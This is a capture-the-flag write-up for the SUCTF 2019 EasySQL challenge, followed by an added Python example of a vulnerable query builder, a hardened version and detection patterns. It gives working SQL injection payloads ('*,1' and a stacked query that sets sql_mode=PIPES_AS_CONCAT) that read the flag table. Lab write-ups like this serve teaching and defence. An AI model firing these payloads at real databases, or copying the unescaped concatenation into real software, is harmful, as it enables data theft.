BUUCTF:[SUCTF 2019]EasySQL

Challenge address: https://buuoj.cn/challenges#[SUCTF%202019]EasySQL

The page takes a SQL query and echoes the result. From the shape of the echo, the output here should come from var_dump().

While testing the query, I found that some characters can be used while others are filtered, so I fuzzed the query point to see exactly which characters are filtered.

The responses with a length of 523 are the ones that stand out; all other characters are filtered.
PS: Don't set the Burp fuzzing thread count too high here, as it easily triggers 429 responses. With only a handful of characters to test, it is fine to run slowly.

The ; character can be used, so try stacked queries (stacked injection).

First, the query parameter: whatever number we input is echoed back as Array([0] => 1), while input letters produce no echo at all. That does not mean letters are filtered; rather, when the value of query is not a number, the data cannot be queried correctly and so nothing is echoed. The query statement is therefore probably something like this:

$sql = "select ".$post['query']."||flag from Flag";

Once you know the query statement, the rest is easy. First, an unintended solution.

Unintended solution

In the SQL statement, || is the OR operator here, and when querying the contents of fields in a table, the comma , is used to select several fields at once.

payload

*,1

Intended solution

Make the OR operator || behave as a string concatenation operator by changing the SQL mode:

set sql_mode=PIPES_AS_CONCAT;


payload

1;set sql_mode=PIPES_AS_CONCAT;select 1

The statement produced by this splicing should be:

select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag;
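
The splicing above is the whole vulnerability: the query value lands unescaped in the SELECT list, so the ; and , that the fuzz left unfiltered reach MySQL intact. As an added example (not part of the original writeup or the challenge's source), the block below reproduces that splicing, puts a hardened builder next to it that accepts only the integer the application actually expects and binds it as a driver parameter (the %s placeholder style of mysqlclient/PyMySQL is an assumption), and classifies incoming values of the parameter against patterns drawn from the two payloads in this writeup.

```python
import re

# Shape of the challenge's query, reproduced from the PHP shown above: the user value
# is pasted straight into the SELECT list, so ';' and ',' change the statement itself.
def vulnerable_sql(query: str) -> str:
    return "select " + query + "||flag from Flag"

# Hardened form (assumption: the only thing the application ever wants in that position
# is a number). Accept exactly a short integer literal and hand it to the driver as a
# bound parameter; the statement shape is fixed and cannot be extended with ';' or ','.
_INT_LITERAL = re.compile(r"[0-9]{1,10}")

def safe_sql(query: str):
    if not _INT_LITERAL.fullmatch(query):
        raise ValueError("query must be a plain integer literal")
    return "select %s||flag from Flag", (int(query),)

# Detection side: patterns worth alerting on for this parameter, derived from the
# '*,1' and '1;set sql_mode=PIPES_AS_CONCAT;select 1' payloads in the writeup.
_RULES = [
    ("stacked-query separator", re.compile(r";")),
    ("sql_mode tampering", re.compile(r"sql_mode", re.IGNORECASE)),
    ("wildcard with extra column", re.compile(r"\*\s*,")),
    ("non-numeric select item", re.compile(r"[^0-9]")),
]

def classify(query: str) -> list:
    """Return the names of every rule the value trips; an empty list means benign."""
    return [name for name, pattern in _RULES if pattern.search(query)]

if __name__ == "__main__":
    for value in ("1", "*,1", "1;set sql_mode=PIPES_AS_CONCAT;select 1"):
        print(repr(value), "->", vulnerable_sql(value), "| alerts:", classify(value))
```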



Source: blog.csdn.net/mochu7777777/article/details/108937396